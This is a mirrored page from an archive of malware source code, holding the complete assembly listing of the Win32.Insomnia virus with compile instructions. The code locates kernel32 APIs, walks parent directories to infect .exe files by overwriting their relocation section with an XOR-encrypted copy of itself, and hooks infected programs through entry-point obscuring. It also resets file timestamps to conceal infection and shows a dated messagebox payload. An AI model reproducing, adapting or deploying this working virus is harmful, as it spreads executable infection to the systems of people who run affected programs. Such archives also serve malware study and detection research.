mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-22 01:58:51 +00:00
469 lines
10 KiB
Plaintext
469 lines
10 KiB
Plaintext
|
; Win32.Insomnia (c) DR-EF.
|
|||
|
;--------------------------------------------------
|
|||
|
;virus name:Win32.Insomnia
|
|||
|
;virus author:DR-EF
|
|||
|
;virus size:1972 bytes
|
|||
|
;features:
|
|||
|
; o dont increase file size,overwrite reloc
|
|||
|
; section instead.
|
|||
|
; o use EPO - replace all mov eax,fs:[00000000]
|
|||
|
; instructions with call virus decryptor.
|
|||
|
; o encrypted with new key for each file.
|
|||
|
; o use the dotdot method to find files.
|
|||
|
;payload:messagebox with this text:
|
|||
|
; ".:[Win32.Insomnia <20> 2004 DR-EF]:."
|
|||
|
; every year at 29/12.
|
|||
|
;compile:
|
|||
|
; tasm32 /m3 /ml /zi Insomnia.asm , , ;
|
|||
|
; tlink32 /tpe /aa /v Insomnia , Insomnia,,import32.lib
|
|||
|
; pewrsec Insomnia.exe
|
|||
|
;--------------------------------------------------
|
|||
|
|
|||
|
.386
|
|||
|
.model flat
|
|||
|
|
|||
|
extrn ExitProcess:proc
|
|||
|
|
|||
|
virus_size equ (EndVirus-virus_start)
|
|||
|
INVALID_HANDLE_VALUE equ -1
|
|||
|
FILE_ATTRIBUTE_NORMAL equ 00000080h
|
|||
|
OPEN_EXISTING equ 3
|
|||
|
GENERIC_WRITE equ 40000000h
|
|||
|
GENERIC_READ equ 80000000h
|
|||
|
PAGE_READWRITE equ 4h
|
|||
|
FILE_MAP_WRITE equ 00000002h
|
|||
|
|
|||
|
.data
|
|||
|
db ?
|
|||
|
.code
|
|||
|
|
|||
|
virus_start:
|
|||
|
call Delta
|
|||
|
Delta: pop ebp
|
|||
|
sub ebp,offset Delta
|
|||
|
mov ecx,NumberOfKernelBases
|
|||
|
lea esi,[ebp + KernelBaseTable]
|
|||
|
@next_k:lodsd
|
|||
|
call GetKernel32Base
|
|||
|
jc GetApis
|
|||
|
loop @next_k
|
|||
|
jmp reth ;return to host
|
|||
|
KernelBaseTable:
|
|||
|
dd 804d4000h ;winXP
|
|||
|
dd 0bff60000h ;winME
|
|||
|
dd 77f00000h ;winNT
|
|||
|
dd 77e70000h ;win2K
|
|||
|
dd 0bff70000h ;win9X
|
|||
|
NumberOfKernelBases equ 5h
|
|||
|
|
|||
|
GetApis:mov eax,[ebp + kernel32base]
|
|||
|
add eax,[eax + 3ch]
|
|||
|
mov eax,[eax + 78h]
|
|||
|
add eax,[ebp + kernel32base]
|
|||
|
;eax - kernel32 export table
|
|||
|
push eax
|
|||
|
xor edx,edx
|
|||
|
mov eax,[eax + 20h]
|
|||
|
add eax,[ebp + kernel32base]
|
|||
|
mov edi,[eax]
|
|||
|
add edi,[ebp + kernel32base]
|
|||
|
;edi - api names array
|
|||
|
dec edi
|
|||
|
nxt_cmp:inc edi
|
|||
|
lea esi,[ebp + _GetProcAddress]
|
|||
|
mov ecx,0eh
|
|||
|
rep cmpsb
|
|||
|
je search_address
|
|||
|
inc edx
|
|||
|
nxt_l: cmp byte ptr [edi],0h
|
|||
|
je nxt_cmp
|
|||
|
inc edi
|
|||
|
jmp nxt_l
|
|||
|
search_address:
|
|||
|
pop eax
|
|||
|
;eax - kernel32 export table
|
|||
|
;edx - GetProcAddress position
|
|||
|
shl edx,1h
|
|||
|
mov ebx,[eax + 24h]
|
|||
|
add ebx,[ebp + kernel32base]
|
|||
|
add ebx,edx
|
|||
|
mov dx,word ptr [ebx]
|
|||
|
shl edx,2h
|
|||
|
mov ebx,[eax + 1ch]
|
|||
|
add ebx,[ebp + kernel32base]
|
|||
|
add ebx,edx
|
|||
|
mov ebx,[ebx]
|
|||
|
add ebx,[ebp + kernel32base]
|
|||
|
mov [ebp + GetProcAddress],ebx
|
|||
|
mov ecx,NumberOfApis
|
|||
|
lea eax,[ebp + ApiNamesTable]
|
|||
|
lea ebx,[ebp + ApiAddressTable]
|
|||
|
nxt_api:push ecx
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push [ebp + kernel32base]
|
|||
|
call [ebp + GetProcAddress]
|
|||
|
or eax,eax
|
|||
|
je api_err
|
|||
|
mov dword ptr [ebx],eax
|
|||
|
pop eax
|
|||
|
nxt_al: inc eax
|
|||
|
cmp byte ptr [eax],0h
|
|||
|
jne nxt_al
|
|||
|
inc eax
|
|||
|
add ebx,4h
|
|||
|
pop ecx
|
|||
|
loop nxt_api
|
|||
|
jmp InfectFiles
|
|||
|
api_err:add esp,8h
|
|||
|
jmp reth
|
|||
|
|
|||
|
_GetProcAddress db "GetProcAddress",0
|
|||
|
GetProcAddress dd 0
|
|||
|
kernel32base dd 0
|
|||
|
|
|||
|
ApiNamesTable:
|
|||
|
_FindFirstFile db "FindFirstFileA",0
|
|||
|
_FindNextFile db "FindNextFileA",0
|
|||
|
_GetCurrentDirectory db "GetCurrentDirectoryA",0
|
|||
|
_SetCurrentDirectory db "SetCurrentDirectoryA",0
|
|||
|
_CreateFile db "CreateFileA",0
|
|||
|
_CloseHandle db "CloseHandle",0
|
|||
|
_CreateFileMapping db "CreateFileMappingA",0
|
|||
|
_MapViewOfFile db "MapViewOfFile",0
|
|||
|
_UnmapViewOfFile db "UnmapViewOfFile",0
|
|||
|
_GetLocalTime db "GetLocalTime",0
|
|||
|
_LoadLibrary db "LoadLibraryA",0
|
|||
|
_SetFileTime db "SetFileTime",0
|
|||
|
|
|||
|
ApiAddressTable:
|
|||
|
FindFirstFile dd 0
|
|||
|
FindNextFile dd 0
|
|||
|
GetCurrentDirectory dd 0
|
|||
|
SetCurrentDirectory dd 0
|
|||
|
CreateFile dd 0
|
|||
|
CloseHandle dd 0
|
|||
|
CreateFileMapping dd 0
|
|||
|
MapViewOfFile dd 0
|
|||
|
UnmapViewOfFile dd 0
|
|||
|
GetLocalTime dd 0
|
|||
|
LoadLibrary dd 0
|
|||
|
SetFileTime dd 0
|
|||
|
|
|||
|
NumberOfApis equ 12
|
|||
|
|
|||
|
GetKernel32Base:
|
|||
|
pushad
|
|||
|
lea ebx,[ebp + k32err]
|
|||
|
push ebx
|
|||
|
xor ebx,ebx
|
|||
|
push dword ptr fs:[ebx]
|
|||
|
mov fs:[ebx],esp
|
|||
|
mov ebx,eax
|
|||
|
cmp word ptr [eax],"ZM"
|
|||
|
jne _k32err
|
|||
|
add eax,[eax + 3ch]
|
|||
|
cmp word ptr [eax],"EP"
|
|||
|
jne _k32err
|
|||
|
mov [ebp + kernel32base],ebx
|
|||
|
pop dword ptr fs:[0]
|
|||
|
add esp,4h
|
|||
|
popad
|
|||
|
stc
|
|||
|
ret
|
|||
|
_k32err:pop dword ptr fs:[0]
|
|||
|
add esp,4h
|
|||
|
popad
|
|||
|
clc
|
|||
|
ret
|
|||
|
k32err: mov esp,[esp + 8h]
|
|||
|
pop dword ptr fs:[0]
|
|||
|
add esp,4h
|
|||
|
popad
|
|||
|
clc
|
|||
|
ret
|
|||
|
|
|||
|
VirusCopyRight db ".:[Win32.Insomnia <20> 2004 DR-EF]:.",0
|
|||
|
|
|||
|
InfectFiles:
|
|||
|
mov [ebp + max_dirs],0fh
|
|||
|
lea eax,[ebp + cdir]
|
|||
|
push eax
|
|||
|
push 0ffh
|
|||
|
call [ebp + GetCurrentDirectory]
|
|||
|
or eax,eax
|
|||
|
je ReturnToHost
|
|||
|
s_files:cmp [ebp + max_dirs],0h
|
|||
|
je r_dir
|
|||
|
lea eax,[ebp + WIN32_FIND_DATA]
|
|||
|
push eax
|
|||
|
lea eax,[ebp + search_mask]
|
|||
|
push eax
|
|||
|
call [ebp + FindFirstFile]
|
|||
|
cmp eax,INVALID_HANDLE_VALUE
|
|||
|
je nxt_dir
|
|||
|
mov [ebp + hfind],eax
|
|||
|
i_file: call InfectFile
|
|||
|
lea eax,[ebp + WIN32_FIND_DATA]
|
|||
|
push eax
|
|||
|
push [ebp + hfind]
|
|||
|
call [ebp + FindNextFile]
|
|||
|
or eax,eax
|
|||
|
jne i_file
|
|||
|
nxt_dir:dec [ebp + max_dirs]
|
|||
|
lea eax,[ebp + dotdot]
|
|||
|
push eax
|
|||
|
call [ebp + SetCurrentDirectory]
|
|||
|
or eax,eax
|
|||
|
jne s_files
|
|||
|
r_dir: lea eax,[ebp + cdir]
|
|||
|
push eax
|
|||
|
call [ebp + SetCurrentDirectory]
|
|||
|
ReturnToHost:
|
|||
|
;check for payload:
|
|||
|
lea eax,[ebp + SYSTEMTIME]
|
|||
|
push eax
|
|||
|
call [ebp + GetLocalTime]
|
|||
|
cmp word ptr [ebp + wMonth],0ch
|
|||
|
jne reth
|
|||
|
cmp word ptr [ebp + wDay],1dh
|
|||
|
jne reth
|
|||
|
lea eax,[ebp + user32dll]
|
|||
|
push eax
|
|||
|
call [ebp + LoadLibrary]
|
|||
|
or eax,eax
|
|||
|
je reth
|
|||
|
lea ebx,[ebp + MessageBox]
|
|||
|
push ebx
|
|||
|
push eax
|
|||
|
call [ebp + GetProcAddress]
|
|||
|
or eax,eax
|
|||
|
je reth
|
|||
|
xor ecx,ecx
|
|||
|
push MB_ICONINFORMATION or MB_SYSTEMMODAL
|
|||
|
push ecx
|
|||
|
lea ebx,[ebp + VirusCopyRight]
|
|||
|
push ebx
|
|||
|
push ecx
|
|||
|
call eax
|
|||
|
reth: popfd
|
|||
|
popad
|
|||
|
db 64h,0A1h,0,0,0,0 ;mov eax,fs:[00000000]
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
SYSTEMTIME:
|
|||
|
wYear dw 0
|
|||
|
wMonth dw 0
|
|||
|
wDayOfWeek dw 0
|
|||
|
wDay dw 0
|
|||
|
wHour dw 0
|
|||
|
wMinute dw 0
|
|||
|
wSecond dw 0
|
|||
|
wMilliseconds dw 0
|
|||
|
|
|||
|
user32dll db "user32.dll",0
|
|||
|
MessageBox db "MessageBoxA",0
|
|||
|
MB_SYSTEMMODAL equ 00001000h
|
|||
|
MB_ICONINFORMATION equ 00000040h
|
|||
|
|
|||
|
|
|||
|
hfind dd 0
|
|||
|
max_dirs db 0fh
|
|||
|
search_mask db "*.exe",0
|
|||
|
dotdot db "..",0
|
|||
|
cdir db 0ffh dup(0)
|
|||
|
|
|||
|
|
|||
|
WIN32_FIND_DATA:
|
|||
|
dwFileAttributes dd 0
|
|||
|
ftCreationTime dq 0
|
|||
|
ftLastAccessTime dq 0
|
|||
|
ftLastWriteTime dq 0
|
|||
|
nFileSizeHigh dd 0
|
|||
|
nFileSizeLow dd 0
|
|||
|
dwReserved0 dd 0
|
|||
|
dwReserved1 dd 0
|
|||
|
cFileName db 0ffh dup (0)
|
|||
|
cAlternateFileName db 20 dup (0)
|
|||
|
|
|||
|
|
|||
|
InfectFile:
|
|||
|
inc byte ptr [ebp + decrypt_key] ;create new key
|
|||
|
lea ebx,[ebp + cFileName]
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push FILE_ATTRIBUTE_NORMAL
|
|||
|
push OPEN_EXISTING
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push GENERIC_READ or GENERIC_WRITE
|
|||
|
push ebx
|
|||
|
call [ebp + CreateFile]
|
|||
|
cmp eax,INVALID_HANDLE_VALUE
|
|||
|
je ExitInfect
|
|||
|
mov [ebp + hfile],eax
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push PAGE_READWRITE
|
|||
|
push eax
|
|||
|
push [ebp + hfile]
|
|||
|
call [ebp + CreateFileMapping]
|
|||
|
or eax,eax
|
|||
|
je close_f
|
|||
|
mov [ebp + hmap],eax
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push FILE_MAP_WRITE
|
|||
|
push [ebp + hmap]
|
|||
|
call [ebp + MapViewOfFile]
|
|||
|
or eax,eax
|
|||
|
je close_m
|
|||
|
mov [ebp + mapbase],eax
|
|||
|
;check for valid pe file
|
|||
|
cmp word ptr [eax],"ZM"
|
|||
|
jne CloseFile
|
|||
|
add eax,[eax + 3ch]
|
|||
|
cmp word ptr [eax],"EP"
|
|||
|
jne CloseFile
|
|||
|
;goto sections table
|
|||
|
mov cx,[eax + 6h] ; get number of sections
|
|||
|
and ecx,0ffffh
|
|||
|
mov ebx,[eax + 34h];get image base
|
|||
|
mov dword ptr [ebp + Virus_Start],ebx ;save image base insaid decryptor
|
|||
|
mov ebx,[eax + 74h];get number of datadirectory
|
|||
|
shl ebx,3h
|
|||
|
add eax,ebx
|
|||
|
add eax,78h
|
|||
|
push eax ;eax - sections table
|
|||
|
push ecx ;ecx - number of sections
|
|||
|
;check for reloc section
|
|||
|
@sec: cmp dword ptr [eax],"ler."
|
|||
|
jne nxt_sec
|
|||
|
cmp dword ptr [eax + 2h],"cole"
|
|||
|
je f_rec
|
|||
|
nxt_sec:add eax,28h
|
|||
|
loop @sec
|
|||
|
ext_rlc:add esp,8h ;restore stack
|
|||
|
jmp CloseFile
|
|||
|
;check if the reloc section is bigger than virus
|
|||
|
f_rec: cmp dword ptr [eax + 8h],virus_size ;eax - reloc section header !
|
|||
|
jb ext_rlc
|
|||
|
;set new section flags
|
|||
|
or dword ptr [eax + 24h],0c0000020h ;code\readable\writeable
|
|||
|
;goto the section raw data:
|
|||
|
mov edx,[eax + 0ch]
|
|||
|
mov eax,[eax + 14h]
|
|||
|
add eax,[ebp + mapbase]
|
|||
|
;overwrite the reloc section with the virus
|
|||
|
mov edi,eax
|
|||
|
lea esi,[ebp + virus_start]
|
|||
|
mov ecx,virus_size
|
|||
|
@enc: lodsb
|
|||
|
xor al,byte ptr [ebp + decrypt_key]
|
|||
|
stosb
|
|||
|
loop @enc
|
|||
|
pop ecx ;ecx - number of sections
|
|||
|
pop ebx ;ebx - sections table
|
|||
|
sub eax,[ebp + mapbase]
|
|||
|
add dword ptr [ebp + Virus_Start],edx ;eax - virus start infected files
|
|||
|
@sec2: cmp dword ptr [ebx + 1h],"txet" ;text ?
|
|||
|
je f_cod
|
|||
|
cmp dword ptr [ebx + 1h],"edoc" ;code ?
|
|||
|
je f_cod
|
|||
|
cmp dword ptr [ebx],"EDOC" ;CODE ?
|
|||
|
je f_cod
|
|||
|
add ebx,28h
|
|||
|
loop @sec2
|
|||
|
add esp,4h ;restore stack
|
|||
|
jmp CloseFile
|
|||
|
;ebx - code section header
|
|||
|
f_cod: mov ecx,[ebx + 10h] ;ecx - size of section raw data
|
|||
|
mov edx,[ebx + 8h] ;edx - virtual section size
|
|||
|
sub ecx,edx
|
|||
|
cmp ecx,DecryptorSize
|
|||
|
ja write_d
|
|||
|
add esp,4h
|
|||
|
jmp CloseFile
|
|||
|
write_d:mov edi,[ebx + 14h]
|
|||
|
mov [ebp + virus_entry_point],edi
|
|||
|
add [ebp + virus_entry_point],edx
|
|||
|
add edi,[ebp + mapbase]
|
|||
|
push edi ;save code section raw data
|
|||
|
add edi,edx ;esi - where to write virus decryptor
|
|||
|
lea esi,[ebp + VirusDecryptorStart]
|
|||
|
mov ecx,DecryptorSize
|
|||
|
rep movsb
|
|||
|
pop esi ;esi - code section raw data
|
|||
|
;search for all mov eax,fs:[00000000] and replace it with nop --> call virus_decryptor
|
|||
|
xchg edx,ecx ;ecx - code section virtual size
|
|||
|
@1: cmp word ptr [esi],0a164h
|
|||
|
jne nxt_w
|
|||
|
cmp dword ptr [esi + 2],0
|
|||
|
jne nxt_w
|
|||
|
;esi - mov eax,fs:[00000000] location.
|
|||
|
mov byte ptr [esi],90h ;nop
|
|||
|
mov byte ptr [esi + 1h],0e8h;call
|
|||
|
mov eax,[ebp + virus_entry_point]
|
|||
|
mov ebx,esi
|
|||
|
sub ebx,[ebp + mapbase]
|
|||
|
sub eax,ebx
|
|||
|
sub eax,6h
|
|||
|
mov dword ptr [esi + 2h],eax
|
|||
|
nxt_w: inc esi
|
|||
|
loop @1
|
|||
|
CloseFile:
|
|||
|
push [ebp + mapbase]
|
|||
|
call [ebp + UnmapViewOfFile]
|
|||
|
close_m:push [ebp + hmap]
|
|||
|
call [ebp + CloseHandle]
|
|||
|
close_f:lea eax,[ebp + ftLastWriteTime]
|
|||
|
push eax
|
|||
|
lea eax,[ebp + ftLastAccessTime]
|
|||
|
push eax
|
|||
|
lea eax,[ebp + ftCreationTime]
|
|||
|
push eax
|
|||
|
push [ebp + hfile]
|
|||
|
call [ebp + SetFileTime]
|
|||
|
push [ebp + hfile]
|
|||
|
call [ebp + CloseHandle]
|
|||
|
ExitInfect:
|
|||
|
ret
|
|||
|
|
|||
|
VirusDecryptorStart equ $
|
|||
|
pushad
|
|||
|
pushfd
|
|||
|
mov esi,00000000
|
|||
|
Virus_Start equ $-4
|
|||
|
push esi
|
|||
|
mov edi,esi
|
|||
|
mov ecx,virus_size
|
|||
|
@dcrypt:lodsb
|
|||
|
xor al,5h
|
|||
|
decrypt_key equ $-1
|
|||
|
stosb
|
|||
|
loop @dcrypt
|
|||
|
ret
|
|||
|
EndVirusDecryptor equ $
|
|||
|
DecryptorSize equ (EndVirusDecryptor - VirusDecryptorStart)
|
|||
|
|
|||
|
hfile dd 0
|
|||
|
hmap dd 0
|
|||
|
mapbase dd 0
|
|||
|
virus_entry_point dd 0
|
|||
|
|
|||
|
EndVirus equ $
|
|||
|
|
|||
|
First_Gen_Host:
|
|||
|
push offset exit
|
|||
|
pushfd
|
|||
|
pushad
|
|||
|
jmp virus_start
|
|||
|
exit: push eax
|
|||
|
call ExitProcess
|
|||
|
end First_Gen_Host
|